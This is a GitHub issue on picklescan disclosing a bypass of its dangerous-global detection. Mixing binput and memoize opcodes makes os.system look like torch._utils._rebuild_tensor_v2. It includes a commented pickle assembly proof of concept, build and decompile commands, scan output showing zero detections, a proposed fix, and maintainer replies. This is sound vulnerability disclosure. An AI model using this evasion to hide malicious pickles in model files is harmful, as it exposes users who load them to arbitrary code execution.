mmaitre314/picklescan

Dangerous global detection bypass with memo dict confusion

dennis-doyensec opened this issue · 2 comments

Info

The picklescan tool attempts to keep track of the memo dict by parsing the
memoize opcodes whenever seen. The binput and put instructions also
insert objects into the memo but are left unhandled. While a legitimate python3
pickle should never mix *put and memoize instructions, doing so is accepted
by pickle.load.

Malware can potentially set up the memo using a mix of these opcodes so that
picklescan thinks memo[0] contains a safe module name like torch._utils
when it actually contains a dangerous one. Used in conjunction with the binget
and stack_global instructions, this lets any arbitrary Python import look
safe to picklescan.

Example

The following example uses radare2 (rasm2 and r2
commands) with the r2pickledec
plugin.

The following memo.asm file is commented to explain the bypass. Comments
start with ;.

;; Dangerous strings added to memo
binstring "os"      ;; module name for os.system
binput 0            ;; memo[0] = stack[-1] = "os"
binstring "system"  ;; function name for os.system
binput 1            ;; memo[1] = stack[-1] = "system"

;; Safe strings added to memo
binstring "torch._utils"
memoize
binstring "_rebuild_tensor_v2"
memoize

;; State of memo
;; real memo looks like
;;; memo = {0: "os", 1: "system", 2: "torch._utils", 3: "_rebuild_tensor_v2"}
;;; picklescan's memo looks like
;;; memo = {0: "torch._utils", 1: "_rebuild_tensor_v2"}

binget 0        ;; "os" but picklescan thinks it's "torch._utils"
binget 1        ;; "system" but picklescan thinks it's "_rebuild_tensor_v2"
stack_global    ;; really: "os.system" but Picklescan thinks this is "torch._utils._rebuild_tensor_v2"
stop
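The two memo views described in the comments above can be reproduced with a toy model. This is only a sketch: `run`, `OPS`, and the `handle_put` flag are hypothetical names made up for illustration, and the `handle_put=False` branch is a simplified stand-in for a scanner that ignores binput, not picklescan's actual code.

```python
def run(ops, handle_put):
    """Replay ops on a toy stack and memo; return (memo, top of stack)."""
    stack, memo = [], {}
    for name, arg in ops:
        if name == "binstring":
            stack.append(arg)
        elif name == "memoize":
            # memoize stores the top of the stack at index len(memo)
            memo[len(memo)] = stack[-1]
        elif name == "binput":
            # A scanner that ignores binput never records this entry
            if handle_put:
                memo[arg] = stack[-1]
        elif name == "binget":
            stack.append(memo[arg])
        elif name == "stack_global":
            func = stack.pop()
            module = stack.pop()
            stack.append(f"{module}.{func}")
    return memo, stack[-1]


# Same instruction sequence as memo.asm
OPS = [
    ("binstring", "os"), ("binput", 0),
    ("binstring", "system"), ("binput", 1),
    ("binstring", "torch._utils"), ("memoize", None),
    ("binstring", "_rebuild_tensor_v2"), ("memoize", None),
    ("binget", 0), ("binget", 1),
    ("stack_global", None),
    ("stop", None),
]

real_memo, real_global = run(OPS, handle_put=True)
scanner_memo, scanner_global = run(OPS, handle_put=False)
print(real_global)      # os.system
print(scanner_global)   # torch._utils._rebuild_tensor_v2
```

With binput honored, the memoize entries land at indices 2 and 3; with binput ignored, they land at 0 and 1, which is exactly the mismatch the bypass relies on.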

The pickle can be assembled with rasm2.

$ rasm2 -a pickle -Bf memo.asm > memo.pickle
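For readers without radare2, the same byte stream can probably be built directly in Python. The sketch below assumes that the binstring mnemonic maps to the BINSTRING opcode (`T` followed by a 4-byte little-endian length), which is consistent with the offsets in the r2 output; the helper name `binstring` and the variable `payload` are made up for illustration. Loading the result only resolves os.system; it does not call it.

```python
import os
import pickle
import struct

BINPUT, BINGET = b"q", b"h"
MEMOIZE, STACK_GLOBAL, STOP = b"\x94", b"\x93", b"."


def binstring(text):
    """Encode text as a BINSTRING opcode: 'T' + 4-byte length + bytes."""
    data = text.encode("ascii")
    return b"T" + struct.pack("<i", len(data)) + data


payload = b"".join([
    binstring("os"), BINPUT + b"\x00",        # memo[0] = "os"
    binstring("system"), BINPUT + b"\x01",    # memo[1] = "system"
    binstring("torch._utils"), MEMOIZE,       # memo[2]
    binstring("_rebuild_tensor_v2"), MEMOIZE, # memo[3]
    BINGET + b"\x00",                         # push "os"
    BINGET + b"\x01",                         # push "system"
    STACK_GLOBAL,                             # resolve os.system
    STOP,
])

loaded = pickle.loads(payload)
print(loaded is os.system)
```

Writing `payload` to a file should give an input comparable to memo.pickle for testing a scanner.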

Decompiling the pickle with r2 may help with understanding.

# r2 -a pickle -qqc 'pdP' memo.pickle
## VM stack start, len 5
## VM[4]
str_x0 = "os"
## VM[3]
str_x9 = "system"
## VM[2]
str_x16 = "torch._utils"
## VM[1]
str_x28 = "_rebuild_tensor_v2"
## VM[0] TOP
return _find_class(str_x0, str_x9)

The pickle will return os.system when loaded, proving access to a
dangerous function without being detected by picklescan.

$ python3 -m pickle memo.pickle
<built-in function system>

$ picklescan -p memo.pickle
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0

Fix

A legitimate pickle that uses memoize should not use binput or put. So
the simplest fix is to mark any pickle that contains a memoize instruction
together with a binput or put instruction as dangerous.
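A minimal sketch of that check, using the standard library's `pickletools.genops` to walk the opcodes. The function name `mixes_memo_opcodes` is hypothetical, and including LONG_BINPUT alongside PUT and BINPUT is an assumption beyond what is stated above. This is not picklescan's actual patch, and `genops` stops at the first STOP opcode, so a file holding several concatenated pickles would need to be scanned in a loop.

```python
import pickle
import pickletools

# Opcodes that write to the memo at an explicit index.
# LONG_BINPUT is included as an assumption; the text names put and binput.
PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}


def mixes_memo_opcodes(data):
    """Return True if one pickle uses both MEMOIZE and a *PUT opcode."""
    seen_put = False
    seen_memoize = False
    for opcode, _arg, _pos in pickletools.genops(data):
        if opcode.name in PUT_OPS:
            seen_put = True
        elif opcode.name == "MEMOIZE":
            seen_memoize = True
        if seen_put and seen_memoize:
            return True
    return False


# Pickles produced by the standard pickler stick to one memo style.
proto2 = pickle.dumps(["a", "a"], protocol=2)   # uses BINPUT only
proto4 = pickle.dumps(["a", "a"], protocol=4)   # uses MEMOIZE only

# Hand-built stream: BINSTRING "os", BINPUT 0, MEMOIZE, STOP
mixed = b"T\x02\x00\x00\x00os" + b"q\x00" + b"\x94" + b"."

print(mixes_memo_opcodes(proto2), mixes_memo_opcodes(proto4), mixes_memo_opcodes(mixed))
```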

Attempting to parse the memo without a full AST is error-prone. The
r2pickledec plugin is the only tool I am aware of that will produce a
full AST for all Python pickle instructions. Running pdPj will produce the
following JSON for the above pickle.

$ r2 -a pickle -qqc 'pdPj~{}' picks/memo.pickle
{
  "stack": [
    {
      "offset": 0,
      "type": "PY_STR",
      "value": "os"
    },
    {
      "offset": 9,
      "type": "PY_STR",
      "value": "system"
    },
    {
      "offset": 22,
      "type": "PY_STR",
      "value": "torch._utils"
    },
    {
      "offset": 40,
      "type": "PY_STR",
      "value": "_rebuild_tensor_v2"
    },
    {
      "offset": 68,
      "type": "PY_GLOB",
      "value": {
        "module": {
          "offset": 0,
          "type": "PY_STR",
          "prev_seen": ".stack[0]"
        },
        "name": {
          "offset": 9,
          "type": "PY_STR",
          "prev_seen": ".stack[1]"
        }
      }
    }
  ],
  "popstack": [
  ]
}

Using r2pickledec in picklescan is possible through r2pipe but would
require adding dependencies that are not trivially installed with just pip.

I am the author of the pickle architecture in r2 and the r2pickledec
plugin, so I can offer some help if desired.

A warning on using proto for a fix

Since the offending opcodes are protocol 2 instructions, it might be tempting
to only accept them when a pickle starts with proto 2. This won't work. A
pickle can redeclare its protocol version at will without any unpickling
error. Additionally, a pickle that has declared itself as proto 2 still has
access to protocol 4 instructions.
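Both points can be checked with a small hand-built pickle. This is a sketch against CPython's unpickler; the variable names `data` and `value` are made up for illustration. The stream declares proto 2, then uses two protocol 4 opcodes, then redeclares itself as proto 4, and still loads without error.

```python
import pickle

data = (
    b"\x80\x02"        # PROTO 2
    b"\x8c\x05hello"   # SHORT_BINUNICODE, a protocol 4 opcode
    b"\x94"            # MEMOIZE, a protocol 4 opcode
    b"\x80\x04"        # PROTO 4, redeclared mid-stream
    b"."               # STOP
)

value = pickle.loads(data)
print(value)
```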

Thanks! Investigating.

> A legitimate pickle that uses memoize should not use binput or put

If the pickle spec prohibits this, then the "simple fix" is what I'd go for.

I'll take a look on my side too!